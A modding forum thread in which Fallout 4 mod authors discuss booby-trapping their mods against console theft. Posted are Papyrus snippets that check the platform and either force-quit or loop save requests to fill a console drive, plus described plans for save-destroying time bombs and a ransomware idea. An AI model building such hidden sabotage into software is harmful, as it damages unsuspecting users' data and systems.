DDP MY MODS ARE DOWN, COMMENCE ATTACK ON BETHESDAS MAIN PLATFORM

DDProductions83

Id love to see Bethesda use one of my armors for one of their games. Not only because it would be kind of cool but also because id love to see their laywer trying to defend selling content they didnt have the right to use, that was made by someone with no education in game design at all, using non commercial licenses of programs that are not made by them and dont allow to monetize the products....

Except you grant them all those rights when you upload your mod to Bethesda.net / use the CK. Go read the EULAs if you don't believe me.
I cant grant them any right i dont have, which includes making money of products made with a student version of 3ds max and a non commercial version of Substance painter

This is true. But then again they aren't selling your mod, are they? They've never sold anyone's mod as their own product. And you've highlighted the exact reason they won't do that: they can't guarantee that the mod author used tools that allow for commercialization. That is why they simply use mod authors' ideas instead of a mod author's implementation.

I know that they probably wont ever do that but someone above mentioned that they technivally could include our mods into their games and that they even have the right to use meshes or textures, that is what i was refering to.

• Replies 248
  • Created
  • Last Reply

Top Posters In This Topic

Id love to see Bethesda use one of my armors for one of their games. Not only because it would be kind of cool but also because id love to see their laywer trying to defend selling content they didnt have the right to use, that was made by someone with no education in game design at all, using non commercial licenses of programs that are not made by them and dont allow to monetize the products....

Except you grant them all those rights when you upload your mod to Bethesda.net / use the CK. Go read the EULAs if you don't believe me.
I cant grant them any right i dont have, which includes making money of products made with a student version of 3ds max and a non commercial version of Substance painter

This is true. But then again they aren't selling your mod, are they? They've never sold anyone's mod as their own product. And you've highlighted the exact reason they won't do that: they can't guarantee that the mod author used tools that allow for commercialization. That is why they simply use mod authors' ideas instead of a mod author's implementation.

I know that they probably wont ever do that but someone above mentioned that they technivally could include our mods into their games and that they even have the right to use meshes or textures, that is what i was refering to.

They really don't have any legal standing for this at all. I'd like to see a lawyer make the argument that a EULA is grounds for transferring Intellectual Property rights. A water park can have you sign a waiver, but just because you signed it doesn't mean you can't sue them when you break your neck.

And furthermore why would they even try something like what's being suggested? Despite how it looks Bethesda really doesn't like having mods be their #1 PR problem.

Edited by IglooGreenHouse

Would it be possible to, say, make a mod that recognizes if a person is playing on console and crash the game immediately?

I suppose it would. Just refernce some kind of PC specific record and the mod will infinite load screen when on console. But that seems like a Bad Ideatm. Likely there are not these kind of records anywhere to be had, and it's definitely on grey legal grounds.

Not to mention that I, for one, would not download anything knowing that someone put a landmine in there, no matter if the landmine recognized me as a friendly

Then you wont ever download a mod of mine ever again.

https://www.youtube.com/watch?v=JbO9zWluhcM

Cause while I'm not giving it out atm and asked my friends to remain silent on it, I so will use it.

Put this code in your mods as a precaution against mod theft:

If Debug.GetPlatformName() == "PC"
        ; do nothing
    Else
        While Debug.GetPlatformName() != "PC"
            Game.RequestSave()    ; fill their hard drive to capacity
        EndWhile
   EndIf

Problem solved :smile:

Yeah, that won't work, as others have mentioned. There is a workable 'solution' that I've written but I haven't had the ability to test it out on console. And I also haven't posted a guide anywhere.

if(Debug.GetPlatformName()=="360")
     debug.messagebox("You are using a stolen mod please uninstall it")
     Debug.QuitGame()
endif

And you can put it anywhere you like, in a quest that starts once the player loads the game, in an item once init or whatsoever.

I already made a script that harrass the player setting him on fire, or just an utility.wait for half an hour and then just quitgame so he cannot play more than 30 mins the game.

There's a lot of ways to piss off someone if you like it. I mean it's easy and if i don't do it it's because i'm not troll enough but... they're just giving me a reason to write fkin stupid code that i love to write.

That doenst work kata, went through 5 test esp's on private on my xbox and that was one of the tests rofl

Also to everyone crabbing about the malicious crap, well, some damn moderator step in, because by uploading to a PC only hosting site, a PC version of my mod, am I uploading anything malicious by making it toggle a message and quit consoles? Not in my book, or any lawyers I can think of, but would love to hear a weigh in with official weight, Because quite frankly if that's the case can you delete my recent AIO and restore a prior version then set it back to hidden?

Not to mention if that's your definition of malicious IE it harms consoles even knowingly, then HALF MY MODS SHOULD GET ME BANNED, because right now, I know they will break console saves, corrupt them over time etc. So if that's the definition we are going with, where it includes having mods knowingly on this site that will hurt console if someone STEALS MY WORK. Well then... Micalov, your wish has come true, hit it brother. Cause I sure AF am not fixing all of them individually for PC's that run them 100% fine... mostly... at night... mostly...

It being malicious probably depends on what it does.

For example, if some idiot steals your mod, does a decent job of saying it's theirs, and people download it, how much should the end user suffer? I'd think ruining their entire save game on purpose would be a wee bit to far. Giving a message and force quitting though? That in theory could be beneficial to the console user, as the mod isn't optimized for console use, and is a ticking time bomb otherwise.

All that being said, I'd take a certain amount of schadenfreude from a console gamers save breaking in hilarious ways. It may even be a neat thing to upload. Provided you're clear about it breaking their save. It hearkens back to the concept of mutually assured destruction.

The problem is, I do not want to f*#@ing give this info out, it's hilariously simple to detect the consoles, because bethesda made it so we cant detect consoles. But upon knowing how, you can run anything in a script after that. You can bloat their saves, span 5000 persistent deathclaws per second in a empty cell, make a cloak that makes everything they run into persistent, detect all objects around them and dupe them on top of themselves, bloat is easy. or degrade their character, or make the save instantly and 100% dependent on your esp, IE crashes always if it uninstalls, then set a time bomb for 2 weeks to obliterate their save.

So ya, this time, I'm taking the firing pin out of the gun, for now.

It being malicious probably depends on what it does.

For example, if some idiot steals your mod, does a decent job of saying it's theirs, and people download it, how much should the end user suffer? I'd think ruining their entire save game on purpose would be a wee bit to far.

Would that even be possible? They stated that when you download a new mod it creates another save, yeah? So it'd only ruin the save with that downloaded mod. They'd still have their save progress up until that point. <- I don't play on console so I'm not very educated on the situation for them.

The problem is, I do not want to f***ing give this info out, it's hilariously simple to detect the consoles, because bethesda made it so we cant detect consoles. But upon knowing how, you can run anything in a script after that. You can bloat their saves, span 5000 persistent deathclaws per second in a empty cell, make a cloak that makes everything they run into persistent, detect all objects around them and dupe them on top of themselves, bloat is easy. or degrade their character, or make the save instantly and 100% dependent on your esp, IE crashes always if it uninstalls, then set a time bomb for 2 weeks to obliterate their saves.

Personally I hope that a lot of the modding community follows suit. You guys do everyone a service by uploading your mods for general use. Everyone should set their mods to hidden and halt uploads until Bethesda gets their crap together and mod authors get the respect and protection they deserve.

There's absolutely no reason you guys should have to put up with the added grief when you're providing a free service that already takes a huge chunk of your time and effort.

Edited by jt4gov

Probably for the best. But the cynic in me says that such a thing has to be used at least once. If just to show both that its possible to do, and that folks will do it if things don't change. *shrugs*

Anyhow, if it were to be done, I'd just be clear on how the drm is going to screw over the console game, and then hide it really really well. Also, I'd not post it on an account you intend on keeping, just incase they come down harder on you, then on those thieves.

edit: To address Jt4s question, I am not sure you could nail the entire save, but you do like certain hackers do, you build in a time bomb. That way, it only activates after they have invested some serious time into the game. Losing 3-4 hours or more of progress because you have to revert to a prior save would get annoying fast. Even worse, if you don't tell the person which mod was pirated it'd turn into an epic nightmare.

-- Oh gosh, I just had a truly nasty thought. Imagine ransom ware attached to this crap? Give x bitcoin and we will give you a code to save your game. *shudders* I am in no way advocating that, it was just a random thought about how nasty and illegal things could get very quickly.

Edited by Mavkiel